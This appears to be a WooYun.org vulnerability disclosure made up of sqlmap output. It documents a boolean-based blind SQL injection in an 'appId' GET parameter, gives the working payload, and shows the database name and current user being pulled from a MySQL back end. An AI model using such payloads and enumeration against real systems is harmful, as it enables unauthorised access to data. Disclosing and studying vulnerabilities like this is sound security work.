WooYun.org

sts:
---
Parameter: appId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: appId=1 AND 1806=1806&pid=1002347218&pc=20&pn=1
---
[18:22:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[18:22:21] [INFO] fetching database names
[18:22:21] [INFO] fetching number of databases
[18:22:21] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:22:21] [INFO] retrieved:
[18:22:22] [ERROR] unable to retrieve the number of databases
[18:22:22] [INFO] falling back to current database
[18:22:22] [INFO] fetching current database
[18:22:22] [INFO] retrieved: appclient
available databases [1]:
[*] appclient
[18:24:16] [INFO] fetching current user
[18:24:16] [INFO] retrieved: apprw@%
current user:    'apprw@%'